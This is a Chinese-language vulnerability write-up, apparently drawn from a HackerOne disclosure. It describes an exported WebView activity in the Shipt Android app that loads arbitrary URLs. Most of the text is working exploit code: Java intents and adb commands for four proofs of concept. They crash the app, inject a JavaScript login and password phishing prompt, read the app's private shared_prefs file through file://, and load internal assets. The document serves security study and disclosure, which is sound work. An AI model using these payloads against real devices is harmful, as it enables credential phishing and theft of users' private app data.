漏洞学习|攻击导出的WebView Activity

漏洞描述

com.pushio.manager.iam.ui.PushIOMessageViewActivity已将导出设置为 true 使该活动容易受到攻击。 

1
2
3
4
5
6
7
8
<activity android:name="com.pushio.manager.iam.ui.PushIOMessageViewActivity" android:theme="@android:style/Theme.Translucent.NoTitleBar">
  <intent-filter>
    <action android:name="android.intent.action.VIEW"/>
    <category android:name="android.intent.category.DEFAULT"/>
    <category android:name="android.intent.category.BROWSABLE"/>
    <data android:scheme="@string/responsys_api_key"/>
  </intent-filter>
</activity>

com.pushio.manager.iam.ui.PushIOMessageViewActivity允许与WebView交互的类中的一个问题:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
rotected void onStart() {
...
Bundle extras = getIntent().getExtras();
PIOLogger.d("PIOMVA oS extras: " + extras);
if (extras != null) {
    final String content = extras.getString(Param.CONTENT);
    final String url = extras.getString("url");
    String viewType = extras.getString("type");
    ...
    if (TextUtils.isEmpty(viewType)) {
        PIOLogger.w("PIOMVA oS view type not found, closing window...");
        finish();
        return;
    } else if (viewType.equalsIgnoreCase(PushIOMessageViewType.ALERT.toString())) {
    ...
    public void run() {
        try {
            if (PushIOMessageViewActivity.this.mActivityWeakReference != null && PushIOMessageViewActivity.this.mActivityWeakReference.get() != null && !((Activity) PushIOMessageViewActivity.this.mActivityWeakReference.get()).isFinishing()) {
                PushIOMessageViewActivity.this.mPopupWindow.showAtLocation(PushIOMessageViewActivity.this.mParentLayout, 17, 0, 0);
                if (!TextUtils.isEmpty(content)) {
                    PushIOMessageViewActivity.this.mWebView.loadDataWithBaseURL(null, content, "text/html", "utf-8", null);
                } else if (TextUtils.isEmpty(url)) {
                    PushIOMessageViewActivity.this.finish();
                } else {
                    PushIOMessageViewActivity.this.mWebView.loadUrl(url);//load custom url
                }
            }
        } catch (BadTokenException e) {
            PIOLogger.d("PIOMVA oSt " + e.getMessage());
        }

借助特殊意图,可以传递if块并加载您自己的 URL 地址或 Javascript。
看上面代码走到else就可以加载任意url且没有做任何限制。

1
PushIOMessageViewActivity.this.mWebView.loadUrl(url);//load custom url

您可以通过控制台 adb 或通过我的应用程序 HunterExploit 利用此漏洞
PoC 1 - 终止进程 - 允许停止shipt进程 - 信息可用性的威胁 Java PoC:

1
2
3
4
5
Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.shipt.groceries", "com.pushio.manager.iam.ui.PushIOMessageViewActivity");
intent.putExtra("url", "chrome://crash");
intent.putExtra("type", "alert");
startActivity(intent);

ADB Poc:
adb shell am start -n com.shipt.groceries/com.pushio.manager.iam.ui.PushIOMessageViewActivity -a “android.intent.action.VIEW” –es “url” “chrome://crash” –es “type” “alert”

PoC 2 - XSS - 允许网络钓鱼攻击 Java PoC:
可以在应用内打开钓鱼网站的链接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.shipt.groceries", "com.pushio.manager.iam.ui.PushIOMessageViewActivity");
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
intent.putExtra("url", "javascript:{var Login = window.prompt(\"Authorization: Login\", \"Input Login\");var Password = window.prompt(\"Authorization: Password\", \"Input Password\"); alert('Interception of data: '+Login+' '+Password)}");
intent.putExtra("type", "alert");
Intent intentStart = new Intent(Intent.ACTION_MAIN);
intentStart.setComponent(new ComponentName("com.shipt.groceries", "com.shipt.groceries.MainActivity"));
startActivity(intentStart);
        try {
            Thread.sleep(10000);
        } catch (InterruptedException e) {
            e.printStackTrace();
        }
 startActivity(intent);

ADB PoC:
adb shell am start -n com.shipt.groceries/com.shipt.groceries.MainActivity Wait for the application to load, and then run the following command adb shell am start -n com.shipt.groceries/com.pushio.manager.iam.ui.PushIOMessageViewActivity -a “android.intent.action.VIEW” –es “url” “javascript:{window.prompt('Authorization:Login','Input_Login');window.prompt('Authorization:Password','Input_Password')}” –es “type” “alert”
PoC 3 - LFI - 允许您在没有 root 访问权限的情况下读取机密用户文件 - 信息机密性 Java PoC 的威胁:
访问应用内沙箱文件,如果登录信息明文存储在shared_prefs里也可用于窃取登录信息

1
2
3
4
5
6
Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.shipt.groceries", "com.pushio.manager.iam.ui.PushIOMessageViewActivity");
intent.putExtra("url", "file:///data/data/com.shipt.groceries/shared_prefs/pushio_store.xml");
intent.putExtra("type", "alert");

startActivity(intent);

ADB PoC:
adb shell am start -n com.shipt.groceries/com.pushio.manager.iam.ui.PushIOMessageViewActivity -a “android.intent.action.VIEW” –es “url” “file:///data/data/com.shipt.groceries/shared_prefs/pushio_store.xml” –es “type” “alert”
PoC 4 - 读取文件或加载android_asset Java PoC:
加载本地html可用于xss攻击

1
2
3
4
5
6
Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.shipt.groceries", "com.pushio.manager.iam.ui.PushIOMessageViewActivity");
intent.putExtra("url", "file:///android_asset/www/index.html");
intent.putExtra("type", "alert");

startActivity(intent);

ADB PoC:
adb shell am start -n com.shipt.groceries/com.pushio.manager.iam.ui.PushIOMessageViewActivity -a “android.intent.action.VIEW” –es “url” “file:///android_asset/www/index.html” –es “type” “alert”

影响

  1. 攻击者可以通过欺骗用户的信任来在 Shipt 应用程序中加载 JavaScript。
  2. 无需 root 访问权限即可读取用户的个人文件。
  3. 破坏Shipt进程。
  4. 从 android_asset 文件中读取应用程序文件。
  5. 对 WebView 的访问为攻击者提供了许多可能的利用机会。

https://hackerone.com/reports/414101
https://pentestlab.blog/2017/02/12/android-webview-vulnerabilities/